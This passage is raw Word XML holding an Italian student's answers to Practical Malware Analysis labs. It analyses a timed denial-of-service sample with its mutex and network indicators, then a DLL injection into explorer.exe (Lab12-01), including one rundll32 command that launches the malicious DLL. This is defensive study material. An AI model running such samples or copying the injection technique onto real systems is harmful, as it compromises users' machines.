        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="004267EB">
        <w:t>2) Perché questo programma usa un mutex?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268422D4" w14:textId="77777777" w:rsidR="008F64F7" w:rsidRDefault="008F64F7" w:rsidP="008F64F7">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Questo software impiega un meccanismo di Mutex al fine di assicurare l'esecuzione di una sola istanza di questo file in modo simultaneo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF1CE4" w14:textId="368C2F37" w:rsidR="00C25F00" w:rsidRDefault="008F64F7" w:rsidP="008F64F7">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Nel caso in cui OpenMutexA non produca un valore nullo, il programma verrà terminato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6BEAC" w14:textId="2ACC5962" w:rsidR="00C25F00" w:rsidRDefault="00C25F00" w:rsidP="00C25F00">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00C25F00">
        <w:t>3) Qual è una buona firma basata su host da utilizzare per rilevare questo programma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A240FF" w14:textId="1E666DD3" w:rsidR="00C25F00" w:rsidRDefault="001253D3" w:rsidP="00C25F00">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="001253D3">
        <w:t>Il Mutex HGL345 e il servizio Malservice possono essere utilizzati come indicatori host per rilevare questo programma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5DBF6" w14:textId="37312345" w:rsidR="001253D3" w:rsidRDefault="001253D3" w:rsidP="001253D3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="001253D3">
        <w:t>4) Qual è una buona firma basata sulla rete per rilevare questo malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE7BB4" w14:textId="33543DB8" w:rsidR="00495754" w:rsidRDefault="00495754" w:rsidP="00495754">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il malware utilizza i thread per connettersi a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B90192" w14:textId="6FF291FB" w:rsidR="001253D3" w:rsidRDefault="00000000" w:rsidP="00495754">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidR="00495754" w:rsidRPr="004A073E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://www.malwareanalysisbook.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7830E195" w14:textId="42C59EE9" w:rsidR="00495754" w:rsidRDefault="00495754" w:rsidP="00495754">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00495754">
        <w:t>5) Qual è lo scopo di questo programma?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6AB20" w14:textId="23C1D068" w:rsidR="00DC744F" w:rsidRDefault="00DC744F" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Possiamo osservare diverse invocazioni alle funzioni API correlate alle date e ai timer. Di conseguenza, possiamo identificare un momento preciso in cui il malware attiva la sua funzionalità principale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FAD16" w14:textId="77777777" w:rsidR="00DC744F" w:rsidRDefault="00DC744F" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Inizialmente, notiamo l'uso di SystemTimetoFileTime per convertire l'orario di sistema nel formato dell'orario del file (01/01/2100 00:00:00):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C00340" w14:textId="48B1108C" w:rsidR="00DC744F" w:rsidRDefault="005940D6" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il malware utilizza una serie di funzioni per </w:t>
      </w:r>
      <w:r w:rsidR="00167762">
        <w:t>attivarsi nella data selezionata e per una durata stabilita.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41499B6C" w14:textId="256020B7" w:rsidR="00DC744F" w:rsidRDefault="00DC744F" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se l'intervallo di timeout scade, il malware entrerà in uno stato di "dormienza" per altri </w:t>
      </w:r>
      <w:r w:rsidR="00130A74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">giorni prima di terminare. </w:t>
      </w:r>
      <w:r w:rsidR="00EB0425">
        <w:t>Quando viene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> raggiunta la data 01/01/2100 00:00:00, il malware crea 20 thread</w:t>
      </w:r>
      <w:r w:rsidR="00EB0425">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC4AA9" w14:textId="77777777" w:rsidR="00DC744F" w:rsidRDefault="00DC744F" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Questi thread sono configurati per avviarsi all'indirizzo 0x401150 (offset StartAddress). Ciascuno di essi effettuerà ripetute richieste a http://www.malwareanalysisbook.com (in un loop infinito).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11429939" w14:textId="563748D0" w:rsidR="00495754" w:rsidRDefault="00DC744F" w:rsidP="00DC744F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Di conseguenza, possiamo dedurre che l'obiettivo molto probabile di questo programma sia quello di perpetrare un attacco di tipo Denial of Service a </w:t>
      </w:r>
      <w:hyperlink r:id="rId251" w:history="1">
        <w:r w:rsidR="00EB0425" w:rsidRPr="004A073E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://www.malwareanalysisbook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8A174" w14:textId="1016BD41" w:rsidR="004C7D14" w:rsidRDefault="004C7D14">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E858B" w14:textId="3B953DD5" w:rsidR="00CB5262" w:rsidRDefault="00CB5262" w:rsidP="00CB5262">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc140165831"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.4 Process Injection</w:t>
      </w:r>
      <w:r w:rsidR="00435672">
        <w:t xml:space="preserve"> Lab12</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="53671F7C" w14:textId="44745007" w:rsidR="004C7D14" w:rsidRDefault="00181653" w:rsidP="00181653">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00181653">
        <w:t>1) Cosa succede quando si esegue l'eseguibile del malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994A0B8" w14:textId="26EA5134" w:rsidR="00181653" w:rsidRDefault="00BA1B69" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avviando l’eseguibile non si vedono effetti </w:t>
      </w:r>
      <w:r w:rsidR="000E4291">
        <w:t>sul sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5E67C" w14:textId="6E6C2F37" w:rsidR="000E4291" w:rsidRDefault="000E4291" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Nell’analisi successiva capiremo che </w:t>
      </w:r>
      <w:r w:rsidR="00205E01">
        <w:t>il malware prova ad iniettare la dll malevola all’interno dell’explorer ma siamo su un sistema a 64 bit ed anche explorer è a 64 mentre la dll è a 32 e quindi l’iniezione non viene effettuata</w:t>
      </w:r>
      <w:r w:rsidR="001141D0">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1644A6" w14:textId="376FFA13" w:rsidR="001141D0" w:rsidRDefault="001141D0" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Runnando invece la dll con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD78B5" w14:textId="4C404C51" w:rsidR="001141D0" w:rsidRDefault="001141D0">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51466"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">1. rundll32.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Lab12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>01.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>DLLMain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BFC71" w14:textId="249D23AB" w:rsidR="001141D0" w:rsidRDefault="001141D0" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B6E1DB5" wp14:editId="1D3C00F8">
            <wp:extent cx="5353299" cy="1849222"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1280904507"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4507" name="Immagine 1" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId252"/>
                    <a:srcRect t="14247"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5364994" cy="1853262"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810DF81" w14:textId="58EC9762" w:rsidR="003649FD" w:rsidRDefault="00B77606" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avviando la dll viene mostrato ripetutamente un </w:t>
      </w:r>
      <w:r w:rsidR="003649FD">
        <w:t xml:space="preserve">popup di pratical malware analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D64147" w14:textId="77777777" w:rsidR="008F7943" w:rsidRDefault="008F7943" w:rsidP="00892FF1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Testiamo l’iniezione manuale andando a cercare un processo a 32 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493804EC" w14:textId="0A309524" w:rsidR="003649FD" w:rsidRDefault="008F7943" w:rsidP="008F7943">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A58BCEE" wp14:editId="5E7DCE96">
            <wp:extent cx="6159398" cy="3313339"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="589634899" name="Immagine 2" descr="Immagine che contiene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4899" name="Immagine 2" descr="Immagine che contiene schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6170018" cy="3319052"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C9C7A" w14:textId="5AD22B15" w:rsidR="008F7943" w:rsidRDefault="00DD1F0B" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>È possibile verificare immediatamente che l’iniezione è riuscita dalla visualizzazione del popup discusso in precedenza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD7D49" w14:textId="1BE9142F" w:rsidR="00123B6B" w:rsidRDefault="00123B6B" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C45193" w14:textId="23143C98" w:rsidR="00123B6B" w:rsidRDefault="00123B6B" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Da processexplorer possiamo anche verificare in maniera più accurata l’iniezione avvenuta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA30C9" w14:textId="45A79EA6" w:rsidR="00123B6B" w:rsidRDefault="00123B6B" w:rsidP="00123B6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A7E10EF" wp14:editId="36C334BF">
            <wp:extent cx="2538374" cy="3977658"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1163312436" name="Immagine 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2436" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId254"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2547604" cy="3992122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="616390B9" w14:textId="66B8F0F6" w:rsidR="00255B87" w:rsidRDefault="008B2DBE" w:rsidP="00255B87">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008B2DBE">
        <w:t>2) Quale processo viene iniettato?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D578ECD" w14:textId="0DB18BE2" w:rsidR="003266E4" w:rsidRDefault="008B2DBE" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008B2DBE">
        <w:t>Il processo che viene iniettato è explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF9ECA" w14:textId="4AA2EDFB" w:rsidR="008B2DBE" w:rsidRDefault="00E55A28" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non riusciamo a vederlo quando avviamo l’eseguibile ma </w:t>
      </w:r>
      <w:r w:rsidR="00801C0A">
        <w:t>abbiamo riscontri tramite le stringe e il disassemblatore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD78882" w14:textId="1703C45F" w:rsidR="00743A5D" w:rsidRDefault="00861B82" w:rsidP="00743A5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00861B82">
        <w:t>3) Come puoi fare in modo che il malware blocchi i pop-up?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74916FC0" w14:textId="35BA31EF" w:rsidR="003266E4" w:rsidRDefault="00797E35" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>I popup possono essere arrestati terminando il processo che li genera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F574517" w14:textId="2C069A50" w:rsidR="00797E35" w:rsidRDefault="00797E35" w:rsidP="00797E35">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00797E35">
        <w:t>4) Come funziona questo malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3E3A8" w14:textId="243C541B" w:rsidR="00797E35" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="003466F0">
        <w:t>Il malware esegue l'iniezione d</w:t>
      </w:r>
      <w:r>
        <w:t>ella</w:t>
      </w:r>
      <w:r w:rsidRPr="003466F0">
        <w:t xml:space="preserve"> DLL su explorer.exe per eseguire Lab12-01.dll . Il file .dll </w:t>
      </w:r>
      <w:r>
        <w:t>genera gli infiniti popup</w:t>
      </w:r>
      <w:r w:rsidRPr="003466F0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18953A6A" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741C2448" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462B0F65" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8446DB" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2781C80B" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F278479" w14:textId="77777777" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C883E06" w14:textId="0E5A391C" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="00CC2476">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364DA2D1" wp14:editId="7C8F727D">
            <wp:extent cx="5800953" cy="2618909"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="779895005" name="Immagine 4" descr="Immagine che contiene schermata, testo,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5005" name="Immagine 4" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5810084" cy="2623031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F2D3E" w14:textId="2A06A337" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="00963324">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B03097" wp14:editId="72AA6738">
            <wp:extent cx="3796771" cy="2531059"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2015286121" name="Immagine 5"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6121" name="Immagine 5" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId256"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3843194" cy="2562006"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455E443" w14:textId="10C5D863" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="0018196B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110B044B" wp14:editId="5DFD49B0">
            <wp:extent cx="4008730" cy="3621266"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1280545213"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5213" name="Immagine 6" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId257"/>
                    <a:srcRect r="25813"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4043524" cy="3652697"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF404C3" w14:textId="77777777" w:rsidR="0018196B" w:rsidRDefault="0018196B" w:rsidP="008F7943">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496E3C65" w14:textId="13A2773C" w:rsidR="003466F0" w:rsidRDefault="003466F0" w:rsidP="00963324">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AC50659" wp14:editId="0273BE01">
            <wp:extent cx="5552236" cy="4405111"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="858190726"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0726" name="Immagine 7" descr="Immagine che contiene testo, schermata, diagramma, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId258"/>
                    <a:srcRect l="6275" r="10293"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5582333" cy="4428990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42986E3D" w14:textId="41126967" w:rsidR="00CC2476" w:rsidRDefault="00CC2476" w:rsidP="00963324">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC6DA3F" wp14:editId="012CFDAB">
            <wp:extent cx="6122289" cy="4944329"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1773005064" name="Immagine 9"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5064" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId259"/>
                    <a:srcRect l="3302" r="4570"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6122804" cy="4944745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
